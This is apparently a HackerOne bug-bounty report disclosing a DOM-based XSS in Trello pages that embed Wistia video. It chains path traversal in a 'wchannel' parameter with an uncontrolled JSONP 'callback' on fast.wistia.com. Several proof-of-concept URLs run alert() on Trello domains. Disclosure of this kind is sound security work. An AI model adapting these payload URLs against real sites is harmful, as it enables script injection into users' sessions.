Trello: DOM based XSS via Wistia embedding

2016-01-18T17:46:18
ID H1:111440
Type hackerone
Reporter reactors08
Modified 2016-01-20T14:20:31

Description

Hi, You are using Wistia to embed video at trello.com. However external script from fast.wistia.com vulnerable to XSS and allows to run malicious javascript on your side. vulnerable code: fast.wistia.net/assets/external/E-v1.js

I found that parameter wchannel can be controled to load js from http://fast.wistia.com/assets/external/E-v1/channels/[controled input].js example: https://trello.com/guide/customize.html?wchannel=../../../../xxxxxxxxxxxxxxx browser tryied to load script from: https://fast.wistia.com/assets/external/E-v1/channels/xxxxxxx.js

And now the only thing we need is to find the way how to upload malicious script to fast.wistia.com. I wasnt able to upload something but i found that i can control outpoot of a json file via callback parameter: https://fast.wistia.com/embed/medias/[video id].json?callback=[controlled outpoot] proof: https://fast.wistia.com/embed/medias/1yqpy8ics4.json?callback=alert(1)%3Bvar%20x=%27%3bx(//

okay now we can attack trello: proof: https://trello.com/guide/customize.html?wchannel=../../../../embed/medias/1yqpy8ics4.json%3fcallback%3dalert(1)%253bvar%20x%3d%27%253bx(//%23

http://blog.trello.com/introducing-the-all-new-trello-business-class/?wchannel=../../../../embed/medias/1yqpy8ics4.json%3fcallback%3dalert(document.domain)%253bvar%20x%3d%27%253bx(//%23

http://help.trello.com/article/899-getting-started-video-demo?wchannel=../../../../embed/medias/1yqpy8ics4.json%3fcallback%3dalert(document.domain)%253bvar%20x%3d%27%253bx(//%23